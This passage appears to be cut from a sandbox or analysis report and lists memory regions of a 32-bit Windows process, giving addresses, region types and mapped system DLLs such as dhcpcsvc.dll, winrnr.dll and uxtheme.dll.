Region:
	              id = 2396
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2397
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2398
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2399
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2400
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2401
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2402
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2403
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2404
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2405
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2406
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2407
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2410
	        start_va = 0x700a0000
	          end_va = 0x700b9fff
	     entry_point = 0x700a0000
	     region_type = mapped_file
	            name = "ncryptsslp.dll"
	        filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")

Region:
	              id = 2414
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2415
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2416
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2417
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2418
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2419
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2420
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2421
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2422
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2423
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2424
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2425
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2426
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2427
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2428
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2429
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2430
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2431
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2432
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2433
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2434
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2435
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2436
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2437
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2438
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2439
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2440
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2441
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2442
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2443
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2444
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2445
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2446
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2447
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2454
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2455
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2456
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2457
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2458
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2459
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2460
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2461
	        start_va = 0x5100000
	          end_va = 0x5133fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005100000"
	        filename = ""

Region:
	              id = 2462
	        start_va = 0xe300000
	          end_va = 0xe333fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000000e300000"
	        filename = ""

Region:
	              id = 2463
	        start_va = 0x17600000
	          end_va = 0x17668fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000017600000"
	        filename = ""

Region:
	              id = 2464
	        start_va = 0x1c800000
	          end_va = 0x1c833fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000001c800000"
	        filename = ""

Region:
	              id = 2465
	        start_va = 0x1d400000
	          end_va = 0x1d4fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000001d400000"
	        filename = ""

Region:
	              id = 2466
	        start_va = 0x1dd00000
	          end_va = 0x1dd2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000001dd00000"
	        filename = ""

Region:
	              id = 2467
	        start_va = 0x37400000
	          end_va = 0x37418fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000037400000"
	        filename = ""

Region:
	              id = 2468
	        start_va = 0x38000000
	          end_va = 0x38ffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000038000000"
	        filename = ""

Region:
	              id = 2469
	        start_va = 0x3dd00000
	          end_va = 0x3dd38fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000003dd00000"
	        filename = ""

Region:
	              id = 2470
	        start_va = 0x3e700000
	          end_va = 0x3e782fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000003e700000"
	        filename = ""

Region:
	              id = 2471
	        start_va = 0x4620000
	          end_va = 0x465ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004620000"
	        filename = ""

Region:
	              id = 2472
	        start_va = 0x4660000
	          end_va = 0x475ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004660000"
	        filename = ""

Region:
	              id = 2473
	        start_va = 0x4760000
	          end_va = 0x479ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004760000"
	        filename = ""

Region:
	              id = 2474
	        start_va = 0x47a0000
	          end_va = 0x489ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047a0000"
	        filename = ""

Region:
	              id = 2475
	        start_va = 0x48a0000
	          end_va = 0x48dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048a0000"
	        filename = ""

Region:
	              id = 2476
	        start_va = 0x48e0000
	          end_va = 0x49dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048e0000"
	        filename = ""

Region:
	              id = 2477
	        start_va = 0x49e0000
	          end_va = 0x4a1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000049e0000"
	        filename = ""

Region:
	              id = 2478
	        start_va = 0x4a20000
	          end_va = 0x4b1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a20000"
	        filename = ""

Region:
	              id = 2479
	        start_va = 0x2ee00000
	          end_va = 0x2ef1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000002ee00000"
	        filename = ""

Region:
	              id = 2480
	        start_va = 0x37e00000
	          end_va = 0x37e18fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000037e00000"
	        filename = ""

Region:
	              id = 2481
	        start_va = 0x2ee00000
	          end_va = 0x2ee10fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000002ee00000"
	        filename = ""

Region:
	              id = 2482
	        start_va = 0x5140000
	          end_va = 0x553ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005140000"
	        filename = ""

Region:
	              id = 2484
	        start_va = 0x4b20000
	          end_va = 0x4c26fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004b20000"
	        filename = ""

Region:
	              id = 2486
	        start_va = 0x4f20000
	          end_va = 0x50a2fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004f20000"
	        filename = ""

Region:
	              id = 2487
	        start_va = 0x5540000
	          end_va = 0x5741fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005540000"
	        filename = ""

Region:
	              id = 2493
	        start_va = 0x2f700000
	          end_va = 0x2f8fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000002f700000"
	        filename = ""

Region:
	              id = 2494
	        start_va = 0x2f700000
	          end_va = 0x2f7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000002f700000"
	        filename = ""

Region:
	              id = 2495
	        start_va = 0x27400000
	          end_va = 0x275fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000027400000"
	        filename = ""

Region:
	              id = 2496
	        start_va = 0x27400000
	          end_va = 0x274fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000027400000"
	        filename = ""

Region:
	              id = 2497
	        start_va = 0x3e000000
	          end_va = 0x3e0fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000003e000000"
	        filename = ""

Region:
	              id = 2498
	        start_va = 0x5750000
	          end_va = 0x59ccfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005750000"
	        filename = ""

Region:
	              id = 2499
	        start_va = 0x59d0000
	          end_va = 0x5ccbfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000059d0000"
	        filename = ""

Region:
	              id = 2500
	        start_va = 0x70e40000
	          end_va = 0x70e52fff
	     entry_point = 0x70e40000
	     region_type = mapped_file
	            name = "dhcpcsvc6.dll"
	        filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")

Region:
	              id = 2501
	        start_va = 0x70e20000
	          end_va = 0x70e33fff
	     entry_point = 0x70e20000
	     region_type = mapped_file
	            name = "dhcpcsvc.dll"
	        filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")

Region:
	              id = 2502
	        start_va = 0x5540000
	          end_va = 0x58b9fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005540000"
	        filename = ""

Region:
	              id = 2503
	        start_va = 0x6fe60000
	          end_va = 0x6fe71fff
	     entry_point = 0x6fe60000
	     region_type = mapped_file
	            name = "napinsp.dll"
	        filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll")

Region:
	              id = 2504
	        start_va = 0x6fe40000
	          end_va = 0x6fe55fff
	     entry_point = 0x6fe40000
	     region_type = mapped_file
	            name = "pnrpnsp.dll"
	        filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll")

Region:
	              id = 2505
	        start_va = 0x58c0000
	          end_va = 0x5c88fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000058c0000"
	        filename = ""

Region:
	              id = 2506
	        start_va = 0x6fe20000
	          end_va = 0x6fe33fff
	     entry_point = 0x6fe20000
	     region_type = mapped_file
	            name = "nlaapi.dll"
	        filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll")

Region:
	              id = 2508
	        start_va = 0x6fe10000
	          end_va = 0x6fe1afff
	     entry_point = 0x6fe10000
	     region_type = mapped_file
	            name = "winrnr.dll"
	        filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll")

Region:
	              id = 2509
	        start_va = 0xf700000
	          end_va = 0xf7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000000f700000"
	        filename = ""

Region:
	              id = 2510
	        start_va = 0x3d700000
	          end_va = 0x3d7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000003d700000"
	        filename = ""

Region:
	              id = 2518
	        start_va = 0x5540000
	          end_va = 0x5a31fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000005540000"
	        filename = ""

Region:
	              id = 2519
	        start_va = 0x5a40000
	          end_va = 0x6a7ffff
	     entry_point = 0x5a40000
	     region_type = mapped_file
	            name = "staticcache.dat"
	        filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")

Region:
	              id = 2525
	        start_va = 0x70b10000
	          end_va = 0x70b84fff
	     entry_point = 0x70b10000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")

Region:
	              id = 2526
	        start_va = 0x6a80000
	          end_va = 0x6c6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006a80000"
	        filename = ""

Region:
	              id = 2532
	        start_va = 0x77640000
	          end_va = 0x7775efff
	     entry_point = 0x77640000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")

Region:
	              id = 2533
	        start_va = 0x33d0000
	          end_va = 0x33d0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2534
	        start_va = 0x4b20000
	          end_va = 0x4bdbfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004b20000"
	        filename = ""

Region:
	              id = 2535
	        start_va = 0x33d0000
	          end_va = 0x33d3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2536
	        start_va = 0x70020000
	          end_va = 0x7003cfff
	     entry_point = 0x70020000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")

Region:
	              id = 2537
	        start_va = 0x4be0000
	          end_va = 0x4c6bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004be0000"
	        filename = ""

Region:
	              id = 2538
	        start_va = 0x33e0000
	          end_va = 0x33e3fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2539
	        start_va = 0x33f0000
	          end_va = 0x33f0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033f0000"
	        filename = ""

Region:
	              id = 2540
	        start_va = 0x4c70000
	          end_va = 0x4c70fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004c70000"
	        filename = ""

Region:
	              id = 2541
	        start_va = 0x4f20000
	          end_va = 0x4f9ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004f20000"
	        filename = ""

Region:
	              id = 2549
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 2562
	        start_va = 0x34c00000
	          end_va = 0x34cfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000034c00000"
	        filename = ""

Region:
	              id = 2564
	        start_va = 0xfc00000
	          end_va = 0xfcfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000000fc00000"
	        filename = ""

Region:
	              id = 2565
	        start_va = 0x2d700000
	          end_va = 0x2d7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000002d700000"
	        filename = ""

Region:
	              id = 2567
	        start_va = 0x4c70000
	          end_va = 0x4c70fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004c70000"
	        filename = ""

Region:
	              id = 2572
	        start_va = 0x4c70000
	          end_va = 0x4caffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004c70000"
	        filename = ""

Region:
	              id = 2573
	        start_va = 0x4cb0000
	          end_va = 0x4cbffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2574
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 2575
	        start_va = 0x5030000
	          end_va = 0x506ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005030000"
	        filename = ""

Region:
	              id = 2576
	        start_va = 0x5070000
	          end_va = 0x50affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005070000"
	        filename = ""

Region:
	              id = 2577
	        start_va = 0x50b0000
	          end_va = 0x50effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000050b0000"
	        filename = ""

Region:
	              id = 2578
	        start_va = 0x6a80000
	          end_va = 0x6b7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006a80000"
	        filename = ""

Region:
	              id = 2579
	        start_va = 0x6c60000
	          end_va = 0x6c6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006c60000"
	        filename = ""

Region:
	              id = 2580
	        start_va = 0x6c70000
	          end_va = 0x6d6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006c70000"
	        filename = ""

Region:
	              id = 2581
	        start_va = 0x6d70000
	          end_va = 0x6e6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006d70000"
	        filename = ""

Region:
	              id = 2582
	        start_va = 0x6e70000
	          end_va = 0x6f6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006e70000"
	        filename = ""

Region:
	              id = 2583
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2584
	        start_va = 0x4cd0000
	          end_va = 0x4cd8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cd0000"
	        filename = ""

Region:
	              id = 2585
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2587
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 2588
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2589
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2590
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2591
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2592
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2593
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2594
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2595
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2596
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2597
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2598
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2599
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2600
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2601
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2602
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2603
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2604
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2605
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2606
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2607
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2608
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2609
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2610
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2611
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2612
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2613
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
